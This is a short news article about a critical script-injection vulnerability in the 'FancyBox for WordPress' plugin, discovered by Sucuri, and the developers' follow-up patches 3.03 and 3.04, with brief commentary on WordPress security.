A critical vulnerability has been found in one of WordPress’ plugins called ‘FancyBox for WordPress’. This plugin has been downloaded over 600,000 times and is obviously something to be aware of considering the number of possible sites affected.
Daniel Cid, founder and chief technology officer of Sucuri who discovered the vulnerability, wrote in an article ‘After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site.’ At the time of posting, the vulnerability was unpatched and as such, Daniel did not offer any more insight other than to remove the plugin, immediately.
Since then, the developers wasted no time and released two patches, 3.03 and 3.04. The former addressed the actual security flaw and the latter renamed the setting affected by the security issue to stop the malicious code from appearing on sites where the plugin is updated without removing the malicious code.
It's hard to avoid being the subject of an attack like this if you use a third party publishing platform because the design of the code is not the end users choice. WordPress is used on over 70 Million websites and is obviously a popular target for hackers. The majority of people who choose this style of site use it as it is easy to set up and manage. A perfect example of the price of security over convenience.